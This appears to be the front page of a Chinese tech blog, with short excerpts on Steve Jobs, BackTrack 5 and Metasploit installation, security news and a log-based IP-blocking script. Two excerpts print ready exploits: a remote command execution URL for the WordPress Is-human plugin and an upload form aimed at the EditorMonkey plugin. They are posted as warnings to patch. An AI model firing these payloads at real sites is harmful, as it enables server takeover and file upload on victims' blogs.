Pray's Blog

　　有不少伟大的创新创业者，但是在电脑、操作系统、电信、音乐、动画多个领域都有突破性创新的，却只有乔布斯。“堪称先进的技术和魔术难以区分。”阿瑟克拉克的这句话，堪称为乔布斯量身定做。 　　没有乔布斯，就没有1977年的Apple II、1984年的Macintosh、1998年的iMac、2001年的iPod、2007年的iPhone和2010年的iPad。 　　乔布斯能如此成功，应有八个原因：一、预测业界趋势；二、大胆使用最先进的技术；三、打造崭新的商业模式；四、凝聚一流人才；五、憧憬用户尚不自觉的需求...阅读更多

下载地址：http://www.backtrack-linux.org/downloads/ BT5出了有段时间了，拿出来研究会。 与bt4相比，BT5不论从内核上还是应用程序上都进行了升级。bt5同时可以选择下载gnome或者kde桌面系统，而传统bt4默认的是 kde。bt5基于Ubuntu Lucid LTS.Kernel 2.6.38，在安装上也方便了很多，尤其对于中国用户，可以选择中文安装过程。 bt5改之前的黑色调，转为暗红，还是那潇洒的飞龙，在红色底纹上更显杀气。 记录一下vmware虚拟机中安装bt5： 1.首先下载bt5的32位iso文件,选用了gnom...阅读更多

terminal下安装metasploit的方法： 先切换为root su root password: cd /private/var/ apt-get clean wget http://updates.metasploit.com/data/releases/framework-3.7.2.tar.bz2 tar jxpf framework-3.7.2.tar.bz2 #apt-get remove ruby rubygems #wget http://apt.saurik.com/dists/tangelo-0.9/main/binary-iphoneos-arm/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb #dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb #wget http://apt.saurik.com/dists/tangelo-0.9/main/...阅读更多

　　北京时间8月30日消息，《移动新发现》今日报道，据国外媒体报道，一群早期的iPhone黑客目前正在打造一个名为iEmu的项目，这个项目致力于使Linux、Windows、Mac和Android可以模拟运行iOS应用。 　　据悉，这个项目建立在开源模拟器QEMU的基础之上，项目负责人，同时也是参与早期iPhone越狱破解的克里斯·韦德(Chris Wade)表示，希望能完全模拟iOS应用在iPad第一代和iPhone4 A4 CPU上的运行状态。 　　这个项目并不轻松，尽快他们已经模拟出了CPU，但仍然必须模拟出对GPU、USB控制...阅读更多

《连线》报导，研究人员发现，控制监狱牢门的PLC（可编程控制器）中的安全漏洞可让黑客释放出囚犯。破坏伊朗核电站离心机的Stuxnet蠕虫是利用了工业控制系统中PLC的漏洞，而控制牢门的PLC存在类似的漏洞。安全顾问和工程师John Strauchs将在本周举行的DefCon 黑客会议上讨论和演示他的发现。 Strauchs称，监狱使用PLC控制牢门和其它设施上的锁和门。他指出，许多人并不知道监狱是如何设计的，因此这个问 题以前很少有人关注，他们不知道监狱使用了与离心机相同的PLC。PLC并不连...阅读更多

网络黑客组织LulzSec周六（26日）午夜宣布将于7月1日正式解散。他们发出声明称，“在所有的面具、疯狂和混乱之后，我们真的认为AntiSec行动很有效果。”同时，该声明还称，“希望AntiSec行动没有了我们，还能继续，并成为一场革命。” 声明最后表示，这一切真的结束了。高兴的人很多，悲伤的人也不少。“Lulz Security – 我们全体6位成员祝大家2011年快乐，并为我们全球的同行欢呼”。 他们同时放出大量窃取的资料，包括50,000个游戏论坛成员密码、550,000战地测试用户密码、AT&...阅读更多

Is-human是WordPress的一个发表评论验证插件。 这个插件的漏洞能导致远程命令执行。 以下是BUG原理，各位博友赶快修复。 EXP： server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error 其中，passthru(whoami)这里可以执行任意命令，比如ls，uname等。但uname -a， wget等无法执行，含有空格。需要base64编码。 EXP： server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();e...阅读更多

依 知识共享协议-署名·非商业·拒绝演绎(CC-BY-NC-ND) 授权发布。 美国华裔天才儿童邹奇奇演讲：“大人能从小孩身上学到什么？” 精彩观点： 1.”幼稚”这个词是常常从大人身上看到的。 2.孩子的大胆想象拓宽了可能性的疆界。 3.孩子喜欢挑战，大人应提供环境，鼓励尝试，但不要太过设限。 4.不要让孩子变成你们这样的大人， 而是比你们强的大人。 文章地址:http://blog.nodll.com/2011/05/17/ted-lecture/Pray.html 阅读更多

WordPress插件EditorMonkey存在上传BUG。 用Windows 2003系统的博友请注意了。 这BUG也就是Fckeditor的上传BUG。所以WP博友还是用自带的编辑器安全一点。 BUG关键字：plugins/editormonkey   EXP： 1 2 3 4 5 <form id="frmUpload" enctype="multipart/form-data" action=http://BUG网站/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method="post"> Upload a new file:<br> <...阅读更多

以下防止CC攻击主要是过滤访问日志的方法将IP封入防火墙内,将脚本放入cron中十分钟执行一次即可,也可跟据自己的需求进行修改,因为我使用的lighttp做web服务器,所以是读取lighttp访问日志,此脚本同样适用apache服务器: #!/bin/bash /www/MTCC/solution_ip.sh /usr/bin/tail -1000 /var/log/lighttpd/access.log | grep -v 127.0.0.1 | awk '{print $1}' | awk '$1 {++S[$1]} END {for(a in S) print a, S[a]}' | sort -k 2 -n -r | awk '$2&gt;10 {print $1}' &gt; /www/...阅读更多